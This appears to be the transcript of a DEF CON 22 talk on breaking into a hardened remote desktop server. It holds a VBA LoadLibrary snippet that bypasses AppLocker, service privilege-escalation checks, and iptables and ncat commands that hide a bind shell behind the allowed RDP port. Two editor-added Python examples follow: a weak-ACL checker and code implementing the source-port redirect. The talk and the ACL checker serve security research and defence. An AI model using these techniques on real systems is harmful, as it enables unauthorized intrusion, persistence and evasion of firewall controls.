... desktops in 20 seconds
Zoltan Balazs, DEF CON 22, 2014

root@kali:~# whoami
- Zoltan Balazs
- AV testing, AV bypass
- OSCP: Occasional Satire Captain Punk
- CISSP: Certified Interspecie-ial Sheep Shearing Professional
- CPTS: Certified Pajama Toaster Specialist
- MCP: Microsoft Certified Psychopath
- OSWP: Official Sexiest Weasel Popstar
- CHFI: Chronic Hopeless Flux Incompetent
- I'm NOT a CEH
- CyberLympics 2012 CTF 2nd runners up (gula.sh)
- Creator of the Zombie Browser Toolkit, https://github.com/Z6543/ZombieBrowserPack
- Hungary
- I love hacking

How do you hack high security systems? How do you hack high security systems when you are not Tom Cruise?

The mission
- I'm a spy (with a low budget)
- I want access to a hardened, secure RDP (remote desktop) server, e.g. a server that contains confidential documents
- I need persistent C&C access to the RDP server: to upload/download files, and for interactive remote code execution

The solution (in an ideal world)
[Diagram: infected workstation -> secure remote desktop server]
1. Infect the client's desktop
2. Steal the RDP password
3. Connect to RDP
4. Drop malware
5. Command and Control
6. Profit

The challenges
- The RDP server is not reachable from the Internet directly
- Two-factor authentication is used to access the RDP server; no access to the token seeds ;)
- Drive mapping is disabled: no direct file copy
- Restrictive hardware firewall: allows only workstation -> server TCP port 3389, IPv4 only
- An application whitelist is used on the RDP server: M$ AppLocker in my case, with the default policy

Is this realistic? I saw a similar environment at a client; had no time to hack it.

[Diagram: Attacker -> The Internet -> Target Company: infected workstation -> firewall (port 3389 allowed only) -> secure remote desktop server]

In hacking, there is no such thing as impossible. Only things that are more challenging.
Already achieved
- I have remote code execution with C&C on a user's workstation
- I have access to a test RDP server
- I know what the files on the server look like and which services are installed

This is Spartaaaa! (post-exploitation)

Why should you care about this?
- Red team / pentester: new tools
- Blue team: new things to look for during log analysis / incident response
- Policy maker / business: funny pictures

Divide et impera! Divide the problem into smaller pieces and rule them all, one by one:
1. Drop malware into the RDP server = new shiny tool
2. Execute any code on the RDP server: nothing new here
3. Elevate to admin privileges: nothing new, no 0day for you
4. Bypass the hardware firewall = new shiny tool

1. Drop malware into the RDP server
- The malware waits for the user to connect to the RDP server
- It creates a screenshot (or a new animation) and shows it in the foreground
- Optionally it blocks the user's keyboard and mouse for ~20 seconds
- It uses the keyboard and the clipboard to simulate the user:
  1. Starts M$ Word on the RDP server
  2. Drops the encoded ASCII payload
  3. Creates the macro code
  4. The macro writes the binary
  5. The macro starts the binaries

Alternative usage of the user simulator
1. Add a directory to be excluded from AV scans: use the AV GUI! (Only if the user has the privileges and there is no UAC prompt.)
2. Install a new trusted root certification authority and accept the warning, then MiTM the SSL connections. CA pinning does not stop this attack.

The AV is alive. Nope, Chuck Testa.

2. What is AppLocker?

2. Execute any code, bypass AppLocker
AppLocker's own documentation admits: "AppLocker can only control VBScript, JScript, .bat files, .cmd files and Windows PowerShell scripts. It does not control all interpreted code that runs within a host process, for example Perl scripts and macros."
"Applications could contain flags that are passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll file to be loaded." "The administrator on the local computer can modify the AppLocker policies defined in the local GPO."

Execute any code, bypass AppLocker: load a DLL from a Word macro! Even shellcode execution is possible (see http://blog.didierstevens.com/2008/06/05/bpmtk-how-about-srp-whitelists/):

  Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
  hLibrary = LoadLibrary(outputdir + "\hack_service.dll")

(On 64-bit Office the return type should be LongPtr rather than Long; the DLL still loads either way, only the returned handle is truncated.)

3. Elevate to admin
Why do I need admin? It is needed for the last phase, the hardware firewall bypass.
Possibilities:
- Local privilege escalation zero-day for Win 2012
- Exploit an unpatched vulnerability
- Exploit a vulnerable 3rd party program/service
- Etc.
Processes started with admin (or higher) privileges are not restricted by AppLocker!

Elevate to admin - service exploit

  C:\> accesschk.exe -l mvulnservice.exe
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\TERMINAL SERVER USER
        FILE_APPEND_DATA FILE_EXECUTE FILE_READ_ATTRIBUTES FILE_READ_DATA FILE_READ_EA
        FILE_WRITE_ATTRIBUTES FILE_WRITE_DATA FILE_WRITE_EA SYNCHRONIZE READ_CONTROL

  C:\> sc sdshow myvulnservice
  D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRCRPWP;;;IU)(A;;CCLCSWLOCRRC;;;SU)

What to look for: the terminal server user has FILE_WRITE_DATA on the service binary, and the IU ACE (interactively logged-on user) in the service's security descriptor grants RP (service start) and WP (service stop). Overwrite the binary, stop and start the service, and the replaced binary runs with the service's privileges.

Quiz: What's the name of the company which
published the first paper about packet filter firewalls in 1988? (Hint: the company developed the VAX.) Answer: Digital Equipment Corporation.

4. Bypass the hardware firewall
Restrictive firewall:
- No bind shell
- No reverse shell
- No covert channel (DNS, ICMP, IPv6, UDP, proxy)
- No shell!!!
In a different scenario a TCP socket reuse shell would be possible (not persistent), or a (lame) webshell. But not in this case (no exploit, no webserver).

First (bad) idea: after the malware is dropped, mark every packet as special (start it with magic bytes) and let a kernel network filter driver select those packets. Problem: every (hacker) application has to be rewritten, or rerouted through a custom wrapper proxy (on both the server and the client side).

Second idea: use the TCP source port! E.g. source port 1337 is always special. Limitation: NAT on the attacker side may rewrite the source port. But who cares.

Bypassing hardware firewalls on Linux: use code at the kernel level (with root):
  if ((tcp_source_port == 1337) && (tcp_dest_port == 22)) then: redirect to the bind shell on port 31337
  iptables -t nat -A PREROUTING -p tcp --dport 22 --sport 1337 -j REDIRECT --to-ports 31337

[Diagram: attacker or infected workstation -> firewall (port 3389 allowed only) -> secure remote desktop server. The packet with src port 1337 / dst port 3389 passes the firewall; on the server dst port 3389 is rewritten to dst port 31337.]

Bypassing hardware firewalls on Windows x64: installing a kernel driver on Windows x64 is not trivial, a trusted signed driver is needed. Thanks to basil for the WinDivert project (and to Nemea Software Development): a trusted signed kernel driver is already included, and you can interface with it from user mode. Alternatively a PatchGuard bypass could be used (http://www.codeproject.com/Articles/28318/Bypassing-PatchGuard), or the Uroburos rootkit approach: Bring Your Own Vuln. Or install a root CA first with the user simulator ;)

How to set the TCP source port for a meterpreter bind shell (or any program)? Netcat (Nmap build) to da rescue!
  ncat -kl 4444 -c "ncat -p 1337 RDP.SER.VER.IP 3389"

(On the attacker side every connection to local port 4444 is forwarded to the RDP server's port 3389 with source port 1337; the driver on the server redirects those packets to the hidden listener, while the firewall only ever sees port 3389.)

Demo.

Alternative usage of the HW FW bypass: you have admin on a webserver but persistent outbound C&C is blocked. Instead of a local port forward, use netcat to port forward to other machines in the DMZ. Backdoor traffic to hide your communication inside the legitimate network traffic.

The solution as a whole
1. The malware waits for the user to log in to RDP with 2FA
2. Create a screenshot of the user's desktop
3. Put the screenshot on the screen
4. Disable keyboard/mouse
5. Drop the malware by simulating user keyboard events; use the clipboard for large (ASCII) data transfers
6. Start Word, create new macro code
7. Bypass the application whitelist using DLL loading from the Word macro code
8. Escalate privileges to admin (vulnerable service)
9. Install hwfwbypass.exe with the kernel driver
10. Drop meterpreter
11. Profit!

Demo. Demo 2, as seen by the user.

Lessons learned for the red team
- You have two new tools for your post-exploitation toolkit to drop malware into the remote desktop
- If you have admin on a Windows server, you can bypass/fool hardware firewalls using my driver

Lessons learned for the blue team
- Every additional layer of security can still be bypassed
- A restricted remote desktop is a real interface for malware infection
- Use application/protocol aware (NG) firewalls instead of port based ones (these can be bypassed too ;))
- Don't trust your firewall logs blindly

Code release now.

References
- http://reqrypt.org/windivert.html
- http://inputsimulator.codeplex.com/ (modified)
- http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Tereshkin.pdf
- http://blog.didierstevens.com/2011/01/24/circumventing-srp-and-applocker-by-design/
- http://www.room362.com/blog/2014/01/16/application-whitelist-bypass-using-ieexec-dot-exe
- http://leastprivilege.blogspot.fr/2013/04/bypass-applocker-by-loading-dlls-from.html?m=1
- https://www.mandiant.com/blog/hikit-rootkit-advanced-persistent-attack-techniques-part-2/

One more thing... two more things:
- The user simulator is available as a Metasploit post module
- The HW FW bypass is available as a Metasploit post module

Hack The Planet!
https://github.com/MRGEffitas/Write-into-screen
https://github.com/MRGEffitas/hwfwbypass
zoltan.balazs@mrg-effitas.com
https://hu.linkedin.com/in/zbalazs
Twitter: @zh4ck
www.slideshare.net/bz98
Greetz to hekkcamp, JumpESPJump.blogspot.com
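Worked example for the "Elevate to admin - service exploit" slides, added here by the editor; it is not the author's code and not part of the talk. It decodes the `sc sdshow` security descriptor and the `accesschk -l` file ACE shown on those slides and reports why an interactively logged-on RDP user can take the service over. The SDDL rights and trustee abbreviations are the standard Windows ones; the two sample strings are the ones printed on the slides (the accesschk line is used in the flattened single-line form the slide shows, but the parser also accepts accesschk's normal multi-line layout).

```python
import re

# Service-specific and standard rights as the two-letter tokens `sc sdshow` prints.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
    "GX": "GENERIC_EXECUTE",
}
# Well-known trustee abbreviations used in SDDL.
TRUSTEES = {
    "SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
    "BU": "BUILTIN\\Users", "IU": "NT AUTHORITY\\INTERACTIVE",
    "SU": "NT AUTHORITY\\SERVICE", "AU": "NT AUTHORITY\\Authenticated Users",
    "WD": "Everyone",
}
LOW_PRIV = {"BUILTIN\\Users", "NT AUTHORITY\\INTERACTIVE",
            "NT AUTHORITY\\Authenticated Users", "Everyone"}
# Rights that hand over the service outright (reconfigure it or rewrite its DACL).
TAKEOVER = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER",
            "GENERIC_ALL", "GENERIC_WRITE"}
# Rights that only let the holder bounce the service; dangerous once the
# binary itself is writable, because the replaced binary runs on restart.
RESTART = {"SERVICE_START", "SERVICE_STOP"}
FILE_WRITE = {"FILE_WRITE_DATA", "FILE_APPEND_DATA", "WRITE_DAC",
              "WRITE_OWNER", "GENERIC_WRITE", "GENERIC_ALL", "DELETE"}

# Both strings are copied from the slides.
SLIDE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
              "(A;;CCLCSWLOCRRCRPWP;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
SLIDE_FILE_ACE = ("[0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\\TERMINAL SERVER USER "
                  "FILE_APPEND_DATA FILE_EXECUTE FILE_READ_ATTRIBUTES FILE_READ_DATA "
                  "FILE_READ_EA FILE_WRITE_ATTRIBUTES FILE_WRITE_DATA FILE_WRITE_EA "
                  "SYNCHRONIZE READ_CONTROL")


def parse_sddl(sddl):
    """Return [(ace_type, trustee, frozenset(rights))] for the D: (DACL) part."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        raise ValueError("no DACL in SDDL string")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        fields = body.split(";")
        if len(fields) < 6:
            raise ValueError("malformed ACE: " + body)
        ace_type, _flags, rights_str, _obj, _inh, sid = fields[:6]
        if rights_str.startswith("0x"):          # a raw hex mask is legal SDDL too
            rights = {rights_str}
        else:                                     # otherwise two-letter tokens
            rights = {SERVICE_RIGHTS.get(rights_str[i:i + 2], rights_str[i:i + 2])
                      for i in range(0, len(rights_str), 2)}
        aces.append((ace_type, TRUSTEES.get(sid, sid), frozenset(rights)))
    return aces


def weak_service_aces(sddl):
    """Allow-ACEs giving low-privileged principals takeover or start/stop rights."""
    out = []
    for ace_type, trustee, rights in parse_sddl(sddl):
        if ace_type == "A" and trustee in LOW_PRIV:
            hits = sorted(rights & (TAKEOVER | RESTART))
            if hits:
                out.append((trustee, hits))
    return out


def parse_accesschk_ace(text):
    """Split one `accesschk -l` ACE (single- or multi-line) into (trustee, rights)."""
    m = re.match(r"\[\d+\]\s+(ACCESS_\w+_ACE_TYPE):\s+(.*)$", text, re.DOTALL)
    if not m or m.group(1) != "ACCESS_ALLOWED_ACE_TYPE":
        return None
    tokens = m.group(2).split()
    rights = set()
    # Rights are the trailing FOO_BAR tokens; what precedes them is the trustee,
    # which may itself contain spaces ("TERMINAL SERVER USER").
    while tokens and ("_" in tokens[-1] or tokens[-1] in ("SYNCHRONIZE", "DELETE")):
        rights.add(tokens.pop())
    return " ".join(tokens), rights


def service_takeover_path(sddl, file_ace_text):
    """Describe the escalation chain, or return None if it does not hold."""
    weak = weak_service_aces(sddl)
    owners = [t for t, hits in weak if TAKEOVER & set(hits)]
    if owners:
        return "%s can reconfigure the service (e.g. change its binary path)" % ", ".join(owners)
    file_ace = parse_accesschk_ace(file_ace_text)
    if not file_ace or not (file_ace[1] & FILE_WRITE):
        return None
    restarters = [t for t, hits in weak if RESTART & set(hits)]
    if not restarters:
        return None
    return ("%s can overwrite the service binary and %s can stop/start the service, "
            "so the replaced binary runs with the service's privileges"
            % (file_ace[0], ", ".join(restarters)))


if __name__ == "__main__":
    for trustee, hits in weak_service_aces(SLIDE_SDDL):
        print("weak ACE:", trustee, hits)
    print(service_takeover_path(SLIDE_SDDL, SLIDE_FILE_ACE))
```

The check is the one a blue team wants to run over every service on the RDP host: the SDDL alone is harmless when the only low-privilege rights are RP/WP, but combined with a writable binary it becomes the escalation the slides use, and a DC (SERVICE_CHANGE_CONFIG) grant to IU/AU/BU is a takeover on its own.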
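A second added example, for the "Bypassing hardware firewalls" slides: the source-port redirect rule applied in pure Python to constructed IPv4/TCP packets. This is the editor's illustration, not the hwfwbypass driver's code and not from the talk. The port numbers (magic source port 1337, allowed port 3389, hidden listener 31337) are the ones on the slides; the sample packets are constructed here. Packet interception itself would be done by WinDivert or by the iptables REDIRECT rule quoted above; the code below is only the decision and the header rewrite, including the TCP checksum recomputation that any such rewrite must do. It also handles the return direction (replies from 31337 disguised as coming from 3389), which the slides' diagram implies but does not spell out.

```python
import struct

MAGIC = 1337     # attacker-chosen "special" source port (from the slides)
ALLOWED = 3389   # the only port the hardware firewall lets through
HIDDEN = 31337   # where the bind shell really listens on the server


def _checksum(data):
    """RFC 1071 one's-complement checksum over `data` (padded to 16 bits)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_packet(src_ip, dst_ip, sport, dport, payload=b"", flags=0x18):
    """Construct a minimal IPv4/TCP packet (no options) with valid checksums."""
    src = bytes(int(o) for o in src_ip.split("."))
    dst = bytes(int(o) for o in dst_ip.split("."))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0) + payload
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", _checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", _checksum(ip)) + ip[12:]
    return ip + tcp


def parse_ports(pkt):
    """(sport, dport) of an IPv4/TCP packet, or None for anything else."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4 or pkt[9] != 6:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if len(pkt) < ihl + 20:
        return None
    return struct.unpack("!HH", pkt[ihl:ihl + 4])


def _set_ports(pkt, sport, dport):
    """Rewrite the TCP ports and recompute the TCP checksum.

    The IP header checksum is unaffected: only the TCP header changes."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = bytearray(pkt[ihl:])
    struct.pack_into("!HH", tcp, 0, sport, dport)
    struct.pack_into("!H", tcp, 16, 0)
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, 6, len(tcp))
    struct.pack_into("!H", tcp, 16, _checksum(pseudo + bytes(tcp)))
    return pkt[:ihl] + bytes(tcp)


def rewrite(pkt, inbound):
    """The hwfwbypass-style rule on the server.  Returns (packet, rewritten?).

    inbound : workstation -> server, sport == MAGIC and dport == ALLOWED
              -> deliver to the hidden listener instead (dport := HIDDEN)
    outbound: server -> workstation, sport == HIDDEN and dport == MAGIC
              -> disguise the reply as RDP (sport := ALLOWED)
    Everything else, including real RDP sessions, passes untouched.
    """
    ports = parse_ports(pkt)
    if ports is None:
        return pkt, False
    sport, dport = ports
    if inbound and sport == MAGIC and dport == ALLOWED:
        return _set_ports(pkt, sport, HIDDEN), True
    if not inbound and sport == HIDDEN and dport == MAGIC:
        return _set_ports(pkt, ALLOWED, dport), True
    return pkt, False


def tcp_checksum_ok(pkt):
    """True if pseudo-header + TCP segment verifies (one's-complement sum is 0)."""
    ihl = (pkt[0] & 0x0F) * 4
    tcp = pkt[ihl:]
    return _checksum(pkt[12:20] + struct.pack("!BBH", 0, 6, len(tcp)) + tcp) == 0


if __name__ == "__main__":
    # Constructed sample: the attacker's ncat-sourced packet arriving at the server.
    pkt = build_packet("10.0.0.5", "10.0.0.10", MAGIC, ALLOWED, b"meterpreter stage")
    new, hit = rewrite(pkt, inbound=True)
    print("redirected:", hit, "ports:", parse_ports(new), "checksum ok:", tcp_checksum_ok(new))
```

Two things worth noticing when reading it against the firewall logs: the firewall and its logs see a normal workstation-to-3389 flow in both directions, which is why the slides say not to trust the logs blindly; and the only observable oddity on the wire is a fixed, repeated source port on what should be randomly chosen ephemeral ports.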